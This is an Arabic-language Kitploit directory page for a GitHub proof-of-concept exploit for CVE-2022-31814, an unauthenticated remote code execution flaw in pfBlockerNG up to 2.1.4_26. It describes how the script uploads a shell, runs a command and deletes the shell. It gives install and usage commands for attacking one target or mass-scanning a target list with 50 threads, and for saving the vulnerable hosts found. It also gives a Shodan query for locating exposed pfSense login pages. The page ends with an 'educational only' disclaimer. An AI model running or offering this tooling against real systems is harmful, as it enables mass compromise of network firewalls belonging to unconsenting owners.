Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-31814 — pfBlockerNG <= 2.1.4_26 تنفيذ تعليمات برمجية عن بُعد بدون مصادقة (CVE-2022-31814) | Kitploit
أدوات/GitHubGitHub/dkstar11q/cve-2022-31814
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubdkstar11q/cve-2022-31814

CVE-2022-31814

pfBlockerNG <= 2.1.4_26 تنفيذ تعليمات برمجية عن بُعد بدون مصادقة (CVE-2022-31814)

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

pfBlockerNG <= 2.1.4_26 RCE بدون مصادقة

هذا السكربت هو استغلال (proof-of-concept) لـ pfBlockerNG <= 2.1.4_26 يتيح تنفيذ الأوامر عن بُعد. يأخذ عنوان URL واحد أو قائمة من عناوين URL، يرفع شيل (shell)، ينفذ أمرًا، ثم يحذف الشيل.

المتطلبات

يتطلب هذا السكربت تثبيت Python 3.x ووحدتي requests و concurrent.futures. يمكنك تثبيت هذه الوحدات عن طريق تشغيل:

root@kitploit:~
pip3 install requests concurrent.futures

أو

root@kitploit:~
pip3 install -r requirements.txt

الاستخدام

root@kitploit:~
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]

pfBlockerNG <= 2.1.4_26 Unauth RCE

options:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        Console Command ('id')
  -l LIST, --list LIST  List of targets (list.txt)
  -i IP, --ip IP        Base target uri (ex. http://target-uri/)
  -t THREADS, --threads THREADS
                        Number of threads for mass scan
  -o OUTPUT, --output OUTPUT
                        Output file (vuln.txt)

هدف واحد

لاستغلال هدف واحد، استخدم الخيار -i أو --ip وحدد عنوان URL الأساسي أو عنوان IP:

root@kitploit:~
python3 exploit.py -i http://target-uri/ -c 'id'

أهداف متعددة

لفحص قائمة من الأهداف، استخدم الخيار -l أو --list وحدد مسار القائمة:

root@kitploit:~
python3 exploit.py -l list.txt -c 'id' -t 50

يمكن استخدام الخيار -t أو --threads لتحديد عدد الخيوط المستخدمة في الفحص.

المخرجات

إذا تم تحديد الخيار -o أو --output، فسيتم كتابة قائمة الأهداف المتأثرة إلى ملف:

root@kitploit:~
python3 exploit.py -l list.txt -c 'id' -o vuln.txt

استعلام Shodan:

root@kitploit:~
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="

⚠️ إخلاء المسؤولية

هذا السكربت مخصص للأغراض التعليمية فقط. استخدمه على مسؤوليتك الخاصة.

تنزيل الأداة